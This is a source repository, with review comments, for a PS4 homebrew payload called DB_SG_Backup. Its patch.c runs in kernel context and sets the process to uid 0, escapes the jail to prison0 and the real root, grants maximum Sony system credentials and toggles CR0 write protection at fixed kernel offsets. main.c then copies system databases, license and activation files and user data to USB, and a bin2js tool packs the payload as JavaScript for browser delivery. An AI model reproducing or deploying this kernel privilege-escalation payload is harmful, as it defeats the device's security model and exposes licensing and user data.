├── win-clean.bat
├── win-make.bat
├── .gitattributes
├── tool
    ├── Makefile
    └── bin2js.c
├── clean.sh
├── DB_SG_Backup
    ├── include
    │   └── patch.h
    ├── Makefile
    └── source
    │   ├── patch.c
    │   └── main.c
└── exploit.template

/win-clean.bat:
--------------------------------------------------------------------------------
@ECHO OFF
bash -c "./clean.sh"
REM NOTE(review): '#' is not a comment marker in batch; the next line is executed as a
REM command named "#pause" (it fails harmlessly). Use "REM pause" to keep it commented out.
#pause
--------------------------------------------------------------------------------

/win-make.bat:
--------------------------------------------------------------------------------
@ECHO OFF
REM Builds via the bash script; PS4SDK is exported only inside this bash -c invocation.
REM NOTE(review): build.sh is not part of this listing, so what it runs cannot be reviewed here.
bash -c "export PS4SDK=~/PS4-SDK && ./build.sh"
pause
--------------------------------------------------------------------------------

/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto

--------------------------------------------------------------------------------

/tool/Makefile:
--------------------------------------------------------------------------------
# Builds bin2js, the host-side helper that turns a payload binary into a JS array literal.
all: bin2js

# NOTE(review): compiled without warning flags; -Wall -Wextra would point at the
# unchecked fopen/ftell/malloc/fread results in bin2js.c.
bin2js: bin2js.c
	gcc -o bin2js bin2js.c

.PHONY: clean

clean:
	rm bin2js

--------------------------------------------------------------------------------

/clean.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Removes the build outputs of tool/ and DB_SG_Backup/ plus the generated payload files.
# NOTE(review): html_payload/ and bin/ are not in the tree above; presumably build.sh
# (not shown) creates them. Exit statuses of pushd/make are not checked.
pushd tool
make clean
popd
pushd DB_SG_Backup
make clean
popd
rm -f html_payload/DB_SG_Backup.html
rm -f bin/DB_SG_Backup.bin

--------------------------------------------------------------------------------

/tool/bin2js.c:
--------------------------------------------------------------------------------
/*
 * bin2js: reads the file named by argv[1] and prints it on stdout as a
 * JavaScript array literal of 32-bit unsigned integers ("var payload=[...];"),
 * zero-padded up to a multiple of 4 bytes.
 *
 * NOTE(review): the header names were lost in this listing (the "<...>" part of
 * each #include is missing). The code uses assert, FILE/fopen/printf,
 * malloc/free, memset and uint32_t, i.e. <assert.h>, <stdio.h>, <stdlib.h>,
 * <string.h> and <stdint.h>.
 */
#include
#include
#include
#include
#include

int main(int argc, char** argv)
{
    // NOTE(review): assert() is compiled out under NDEBUG, in which case argv[1]
    // is read without any argc check. An explicit check with a usage message is safer.
    assert(argc == 2);
    char* fn = argv[1];
    // NOTE(review): fopen() is not checked; a missing file makes fseek() dereference NULL.
    // The file is opened in text mode ("r"); on platforms that translate line
    // endings this silently corrupts binary input ("rb" avoids that).
    FILE* f = fopen(fn, "r");
    fseek(f, 0, SEEK_END);
    // NOTE(review): ftell() returns -1 on failure and the value is narrowed to int,
    // so a negative or truncated length feeds the malloc()/fread() sizes below.
    int l = ftell(f);
    // Number of 32-bit words needed to hold l bytes, rounded up.
    int ll = (l + 3) / 4;
    fseek(f, 0, SEEK_SET);
    // NOTE(review): malloc() result is not checked. The buffer is zeroed so the
    // padding in the last word is well defined when l is not a multiple of 4.
    char *b = malloc(ll * 4);
    memset(b, 0, ll * 4);
    // NOTE(review): the fread() return value is ignored; a short read leaves
    // trailing zero words that are indistinguishable from padding.
    fread(b, l, 1, f);
    fclose(f);
    // The byte buffer is read as host-order uint32_t words, so the printed values
    // depend on the endianness of the machine running this tool (copying each
    // word out with memcpy would also avoid the aliasing cast).
    uint32_t *u = (uint32_t *)b;
    printf("var payload=[");
    for (int i = 0; i < ll; i++)
    {
        // "%u" assumes uint32_t is unsigned int; PRIu32 from <inttypes.h> is the portable form.
        printf("%u", *u++);
        if (i < (ll - 1)) printf(",");
    }
    printf("];\n");
    free(b);
}

--------------------------------------------------------------------------------

/DB_SG_Backup/include/patch.h:
--------------------------------------------------------------------------------
/*
 * Partial layouts of the kernel structures that patcher() (patch.c) writes to.
 * Only the fields that are dereferenced are named; the "uselessN" members are
 * padding that keeps the named fields at the offsets the code expects.
 *
 * NOTE(review): these layouts are for one specific kernel build and nothing
 * verifies them at runtime; a mismatch means patcher() writes into unrelated
 * kernel memory. uint32_t is used without including <stdint.h>, so the
 * includer (ps4.h in this project) has to provide it. The guard name LINK_H
 * does not match the file name patch.h.
 */
#ifndef LINK_H
#define LINK_H

// Opaque audit state; only its size matters for the offset of the fields after it.
struct auditinfo_addr {
    char useless[184];
};

// Process credentials. cr_uid, cr_ruid, cr_rgid, cr_groups and cr_prison are the
// fields patcher() overwrites.
struct ucred {
    uint32_t useless1;
    uint32_t cr_uid; // effective user id
    uint32_t cr_ruid; // real user id
    uint32_t useless2;
    uint32_t useless3;
    uint32_t cr_rgid; // real group id
    uint32_t useless4;
    void *useless5;
    void *useless6;
    void *cr_prison; // jail(2)
    void *useless7;
    uint32_t useless8;
    void *useless9[2];
    void *useless10;
    struct auditinfo_addr useless11;
    uint32_t *cr_groups; // groups
    uint32_t useless12;
};

// Per-process file descriptor table; only the root and jail directory vnodes are used.
struct filedesc {
    void *useless1[3];
    void *fd_rdir;
    void *fd_jdir;
};

// Process; only the credential and filedesc pointers are used.
struct proc {
    char useless[64];
    struct ucred *p_ucred;
    struct filedesc *p_fd;
};

// Thread; only the owning-process pointer is described here. NOTE(review):
// patch.c also reads the thread at byte offset 304, which this layout does not cover.
struct thread {
    void *useless;
    struct proc *td_proc;
};


// Kernel-context routine invoked by main.c through syscall(11, patcher, td); always returns 0.
int patcher(struct thread *td);

#endif

--------------------------------------------------------------------------------

/DB_SG_Backup/Makefile:
--------------------------------------------------------------------------------
# Builds the DB_SG_Backup payload as a flat binary against libPS4 from $(PS4SDK).
# NOTE(review): PS4SDK must be set in the environment (win-make.bat exports it);
# if it is unset LIBPS4 expands to "/libPS4" and the include/link paths are wrong.
LIBPS4 := $(PS4SDK)/libPS4

CC := gcc
AS := gcc
OBJCOPY := objcopy
ODIR := build
SDIR := source
IDIRS := -I$(LIBPS4)/include -I. -Iinclude
LDIRS := -L$(LIBPS4) -L. -Llib
# -masm=intel is load-bearing: the inline asm operand order in source/patch.c
# (readCr0/writeCr0) is only a read/write pair under Intel syntax.
CFLAGS := $(IDIRS) -Os -std=gnu11 -ffunction-sections -fdata-sections -fno-builtin -nostartfiles -nostdlib -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=small -fpie
SFLAGS := -nostartfiles -nostdlib -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
LFLAGS := $(LDIRS) -Xlinker -T $(LIBPS4)/linker.x -Wl,--build-id=none
CFILES := $(wildcard $(SDIR)/*.c)
SFILES := $(wildcard $(SDIR)/*.s)
OBJS := $(patsubst $(SDIR)/%.c, $(ODIR)/%.o, $(CFILES)) $(patsubst $(SDIR)/%.s, $(ODIR)/%.o, $(SFILES))

LIBS := -lPS4

# Output name is derived from the directory name (DB_SG_Backup.bin here).
TARGET = $(shell basename $(CURDIR)).bin

# NOTE(review): $(ODIR) as a normal prerequisite changes mtime whenever an
# object is written, so the link step reruns on every make; "| $(ODIR)"
# (order-only) is the usual form.
$(TARGET): $(ODIR) $(OBJS)
	$(CC) $(LIBPS4)/crt0.s $(ODIR)/*.o -o temp.t $(CFLAGS) $(LFLAGS) $(LIBS)
	$(OBJCOPY) -O binary temp.t $(TARGET)
	rm -f temp.t

$(ODIR)/%.o: $(SDIR)/%.c
	$(CC) -c -o $@ $< $(CFLAGS)

$(ODIR)/%.o: $(SDIR)/%.s
	$(AS) -c -o $@ $< $(SFLAGS)

$(ODIR):
	@mkdir $@

.PHONY: clean

clean:
	rm -f $(TARGET) $(ODIR)/*.o




--------------------------------------------------------------------------------

/DB_SG_Backup/source/patch.c:
--------------------------------------------------------------------------------
/*
 * Kernel-side part of the payload. main.c hands patcher() to syscall(11, ...)
 * so it executes in kernel context and rewrites the calling process's
 * credentials and root directory.
 *
 * NOTE(review): every kernel address used here is a hard-coded offset for one
 * firmware build and nothing checks at runtime that the running kernel matches;
 * on any other build these writes land in unrelated kernel memory.
 */
#include "ps4.h"
#include "patch.h"

// Reads the MSR selected by __register with rdmsr and returns edx:eax as one
// 64-bit value. rdmsr is a privileged instruction, so this only works while
// running at kernel privilege.
// NOTE(review): identifiers starting with two underscores are reserved for the
// implementation; the odd spelling "unsigned int long long" is valid C for unsigned long long.
unsigned int long long __readmsr(unsigned long __register) {
    unsigned long __edx;
    unsigned long __eax;
    __asm__ ("rdmsr" : "=d"(__edx), "=a"(__eax) : "c"(__register));
    return (((unsigned int long long)__edx) << 32) | (unsigned int long long)__eax;
}

// CR0 write-protect bit; while it is clear, supervisor-mode writes ignore
// read-only page protections.
#define X86_CR0_WP (1 << 16)

// Returns the current value of CR0.
// NOTE(review): the template reads like AT&T syntax, where "movq %0, %%cr0"
// would be a *write* to CR0, but the Makefile builds with -masm=intel, under
// which "mov <reg>, cr0" is a read. Building without that flag swaps the
// meaning of readCr0/writeCr0.
static inline __attribute__((always_inline)) uint64_t readCr0(void) {
    uint64_t cr0;

    asm volatile (
        "movq %0, %%cr0"
        : "=r" (cr0)
        : : "memory"
    );

    return cr0;
}

// Writes cr0 back to CR0 (Intel syntax: "mov cr0, <reg>"; see the note on readCr0).
static inline __attribute__((always_inline)) void writeCr0(uint64_t cr0) {
    asm volatile (
        "movq %%cr0, %0"
        : : "r" (cr0)
        : "memory"
    );
}


/*
 * Rewrites the credentials of td's process (uid/gid 0, host prison, real root
 * vnode, and three extra credential words) and then clears and immediately
 * restores the CR0 write-protect bit.
 *
 * td: the calling thread, as passed by main.c through syscall(11, patcher, td).
 * Returns 0 unconditionally; nothing here can report failure.
 *
 * NOTE(review): no pointer is validated. td->td_proc, p_ucred, p_fd and
 * cred->cr_groups are dereferenced directly, and the kernel addresses below
 * are fixed offsets for a single firmware build.
 */
int patcher(struct thread *td){

    struct ucred* cred;
    struct filedesc* fd;

    fd = td->td_proc->p_fd;
    cred = td->td_proc->p_ucred;

    // Kernel base is derived from MSR 0xC0000082 (the syscall entry address)
    // minus a build-specific constant; the two offsets below are likewise
    // build-specific and unverified.
    void* kernel_base = &((uint8_t*)__readmsr(0xC0000082))[-0x1C0];
    uint8_t* kernel_ptr = (uint8_t*)kernel_base;
    void** got_prison0 = (void**)&kernel_ptr[0x10986A0];
    void** got_rootvnode = (void**)&kernel_ptr[0x22C1A70];

    // uid/gid 0. cr_groups is dereferenced without a NULL check.
    cred->cr_uid = 0;
    cred->cr_ruid = 0;
    cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;

    // Point the credential at the kernel's prison0 (presumably the host/unjailed
    // prison) and reset both the root and jail directories to the real root vnode.
    cred->cr_prison = *got_prison0;
    fd->fd_rdir = fd->fd_jdir = *got_rootvnode;

    // escalate ucred privs, needed for access to the filesystem ie* mounting & decrypting files
    // NOTE(review): byte offset 304 bypasses the struct layouts in patch.h (struct
    // thread there only covers the first 16 bytes); another hard-coded offset.
    void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred

    // sceSblACMgrIsSystemUcred
    uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
    *sonyCred = 0xffffffffffffffff;

    // sceSblACMgrGetDeviceAccessType
    uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
    *sceProcType = 0x3801000000000013; // Max access

    // sceSblACMgrHasSceProcessCapability
    uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
    *sceProcCap = 0xffffffffffffffff; // Sce Process

    // Disable write protection
    // NOTE(review): nothing is written between clearing and restoring WP, so this
    // pair is currently a no-op (presumably leftover from a version that patched
    // kernel text). While WP is clear, any stray write to a read-only kernel page
    // succeeds, so the window should stay empty or be as short as possible.
    uint64_t cr0 = readCr0();
    writeCr0(cr0 & ~X86_CR0_WP);

    // Restore write protection
    writeCr0(cr0);

    return 0;
}

--------------------------------------------------------------------------------

/DB_SG_Backup/source/main.c:
--------------------------------------------------------------------------------
/*
 * User-side entry of the payload. After the kernel patch it backs up the
 * console's database files to a USB drive (usb0 preferred, then usb1) or,
 * when no drive is mounted, to *_backup copies next to the originals.
 *
 * NOTE(review): copy_File, copy_Dir, systemMessage, sceKernelSleep,
 * scePthreadCreate, open/mkdir/unlink and the init* calls come from libPS4
 * (ps4.h). None of their return values are checked, so a failed copy still
 * ends in a "complete" message.
 */
#include "ps4.h"
#include "patch.h"

// Run flag shared between _main and nthread_func with no atomic/volatile
// qualifier or lock. NOTE(review): the polling loop relies on the compiler
// re-reading nthread_run each iteration, which plain int does not guarantee.
int nthread_run;
// Status text re-displayed by nthread_func while non-empty; written by _main with sprintf.
char notify_buf[1024];

/*
 * Notification thread: while nthread_run is set, polls once per second and
 * re-displays notify_buf every 15 seconds for as long as it is non-empty.
 * arg is unused; always returns NULL.
 *
 * NOTE(review): notify_buf is read here while _main may be writing it (a data
 * race); systemMessage() could observe a partially written string.
 */
void *nthread_func(void *arg)
{
    time_t t1, t2;
    t1 = 0;  // time of the last message; 0 makes the first non-empty buffer show immediately
    while (nthread_run)
    {
        if (notify_buf[0])
        {
            t2 = time(NULL);
            if ((t2 - t1) >= 15)
            {
                t1 = t2;
                systemMessage(notify_buf);
            }
        }
        else t1 = 0;
        sceKernelSleep(1);
    }

    return NULL;
}


/*
 * Payload entry point (presumably called from the libPS4 crt0 with the
 * current thread pointer).
 *   1. Initialise libPS4 and run patcher() in kernel context via syscall 11.
 *   2. Probe /mnt/usb0 then /mnt/usb1 by creating a ".dirtest" file.
 *   3. Copy the databases (and, on USB, the user data trees) and report.
 * Always returns 0.
 *
 * NOTE(review): the usb0 and usb1 branches are identical apart from the mount
 * point; a helper taking the mount path would remove the duplication.
 * "DB_Dackup" in the destination paths is presumably a typo of DB_Backup, but
 * it is a runtime path — changing it changes where backups land.
 * NOTE(review): the USB copy writes /user/license and
 * /system_data/priv/activation (presumably licensing/activation data) to
 * removable media under 0777 directories; that drive should be treated as
 * sensitive. The notification thread is never joined; nthread_run = 0 lets it
 * exit on its next 1 s poll.
 */
int _main(struct thread *td) {
    initKernel();
    initLibc();
    initPthread();
    syscall(11,patcher,td);
    initSysUtil();
    nthread_run = 1;
    notify_buf[0] = '\0';
    ScePthread nthread;
    scePthreadCreate(&nthread, NULL, nthread_func, NULL, "nthread");
    // Probe for a writable USB mount; the probe file is unlinked once a mount is chosen.
    int usbdir = open("/mnt/usb0/.dirtest", O_WRONLY | O_CREAT | O_TRUNC, 0777);
    if (usbdir == -1)
    {
        usbdir = open("/mnt/usb1/.dirtest", O_WRONLY | O_CREAT | O_TRUNC, 0777);
        if (usbdir == -1)
        {
            // No USB drive: database-only backup next to the originals.
            copy_File("/system_data/priv/mms/app.db", "/system_data/priv/mms/app.db_backup");
            copy_File("/system_data/priv/mms/addcont.db", "/system_data/priv/mms/addcont.db_backup");
            copy_File("/system_data/priv/mms/av_content_bg.db", "/system_data/priv/mms/av_content_bg.db_backup");
            copy_File("/user/system/webkit/secure/appcache/ApplicationCache.db", "/user/system/webkit/secure/appcache/ApplicationCache.db_backup");
            copy_File("/user/system/webkit/webbrowser/appcache/ApplicationCache.db", "/user/system/webkit/webbrowser/appcache/ApplicationCache.db_backup");
            systemMessage("Internal backup complete.\nThis was only a database backup use a usb drive for full backup.");
            nthread_run = 0;
            return 0;
        }
        else
        {
            close(usbdir);
            systemMessage("Backing up to USB1");
            unlink("/mnt/usb1/.dirtest");
            mkdir("/mnt/usb1/DB_Dackup/", 0777);
            copy_File("/system_data/priv/mms/app.db", "/mnt/usb1/DB_Dackup/app.db");
            copy_File("/system_data/priv/mms/addcont.db", "/mnt/usb1/DB_Dackup/addcont.db");
            copy_File("/system_data/priv/mms/av_content_bg.db", "/mnt/usb1/DB_Dackup/av_content_bg.db");
            mkdir("/mnt/usb1/UserData/", 0777);
            mkdir("/mnt/usb1/UserData/system_data/", 0777);
            mkdir("/mnt/usb1/UserData/system_data/savedata", 0777);
            mkdir("/mnt/usb1/UserData/system_data/priv", 0777);
            mkdir("/mnt/usb1/UserData/system_data/priv/home", 0777);
            mkdir("/mnt/usb1/UserData/system_data/priv/license", 0777);
            mkdir("/mnt/usb1/UserData/system_data/priv/activation", 0777);
            mkdir("/mnt/usb1/UserData/user/", 0777);
            mkdir("/mnt/usb1/UserData/user/home/", 0777);
            mkdir("/mnt/usb1/UserData/user/trophy", 0777);
            mkdir("/mnt/usb1/UserData/user/license", 0777);
            mkdir("/mnt/usb1/UserData/user/settings", 0777);
            mkdir("/mnt/usb1/UserData/user/system", 0777);
            mkdir("/mnt/usb1/UserData/user/system/webkit", 0777);
            mkdir("/mnt/usb1/UserData/user/system/webkit/secure", 0777);
            mkdir("/mnt/usb1/UserData/user/system/webkit/webbrowser", 0777);
            // Constant text, well under sizeof notify_buf; snprintf(notify_buf, sizeof notify_buf, ...)
            // keeps it bounded if the message ever becomes dynamic.
            sprintf(notify_buf, "Copying: User Data\nPlease wait.");
            copy_Dir("/system_data/savedata","/mnt/usb1/UserData/system_data/savedata");
            copy_Dir("/user/home", "/mnt/usb1/UserData/user/home");
            copy_Dir("/user/trophy", "/mnt/usb1/UserData/user/trophy");
            copy_Dir("/user/license", "/mnt/usb1/UserData/user/license");
            copy_Dir("/user/settings", "/mnt/usb1/UserData/user/settings");
            copy_Dir("/user/system/webkit/secure","/mnt/usb1/UserData/user/system/webkit/secure");
            copy_Dir("/user/system/webkit/webbrowser","/mnt/usb1/UserData/user/system/webkit/webbrowser");
            copy_Dir("/system_data/priv/home","/mnt/usb1/UserData/system_data/priv/home");
            copy_Dir("/system_data/priv/license","/mnt/usb1/UserData/system_data/priv/license");
            copy_Dir("/system_data/priv/activation","/mnt/usb1/UserData/system_data/priv/activation");
            notify_buf[0] = '\0';
            nthread_run = 0;
            systemMessage("USB Backup Complete.");
        }
    }
    else
    {
        close(usbdir);
        systemMessage("Backing up to USB0");
        unlink("/mnt/usb0/.dirtest");
        mkdir("/mnt/usb0/DB_Dackup/", 0777);
        copy_File("/system_data/priv/mms/app.db", "/mnt/usb0/DB_Dackup/app.db");
        copy_File("/system_data/priv/mms/addcont.db", "/mnt/usb0/DB_Dackup/addcont.db");
        copy_File("/system_data/priv/mms/av_content_bg.db", "/mnt/usb0/DB_Dackup/av_content_bg.db");
        mkdir("/mnt/usb0/UserData/", 0777);
        mkdir("/mnt/usb0/UserData/system_data/", 0777);
        mkdir("/mnt/usb0/UserData/system_data/savedata", 0777);
        mkdir("/mnt/usb0/UserData/system_data/priv", 0777);
        mkdir("/mnt/usb0/UserData/system_data/priv/home", 0777);
        mkdir("/mnt/usb0/UserData/system_data/priv/license", 0777);
        mkdir("/mnt/usb0/UserData/system_data/priv/activation", 0777);
        mkdir("/mnt/usb0/UserData/user/", 0777);
        mkdir("/mnt/usb0/UserData/user/home/", 0777);
        mkdir("/mnt/usb0/UserData/user/trophy", 0777);
        mkdir("/mnt/usb0/UserData/user/license", 0777);
        mkdir("/mnt/usb0/UserData/user/settings", 0777);
        mkdir("/mnt/usb0/UserData/user/system", 0777);
        mkdir("/mnt/usb0/UserData/user/system/webkit", 0777);
        mkdir("/mnt/usb0/UserData/user/system/webkit/secure", 0777);
        mkdir("/mnt/usb0/UserData/user/system/webkit/webbrowser", 0777);
        // Same bounded-constant note as in the usb1 branch.
        sprintf(notify_buf, "Copying: User Data\nPlease wait.");
        copy_Dir("/system_data/savedata","/mnt/usb0/UserData/system_data/savedata");
        copy_Dir("/user/home", "/mnt/usb0/UserData/user/home");
        copy_Dir("/user/trophy", "/mnt/usb0/UserData/user/trophy");
        copy_Dir("/user/license", "/mnt/usb0/UserData/user/license");
        copy_Dir("/user/settings", "/mnt/usb0/UserData/user/settings");
        copy_Dir("/user/system/webkit/secure","/mnt/usb0/UserData/user/system/webkit/secure");
        copy_Dir("/user/system/webkit/webbrowser","/mnt/usb0/UserData/user/system/webkit/webbrowser");
        copy_Dir("/system_data/priv/home","/mnt/usb0/UserData/system_data/priv/home");
        copy_Dir("/system_data/priv/license","/mnt/usb0/UserData/system_data/priv/license");
        copy_Dir("/system_data/priv/activation","/mnt/usb0/UserData/system_data/priv/activation");
        notify_buf[0] = '\0';
        nthread_run = 0;
        systemMessage("USB Backup Complete.");
    }

    return 0;
}


--------------------------------------------------------------------------------

/exploit.template:
--------------------------------------------------------------------------------
#NAME#

--------------------------------------------------------------------------------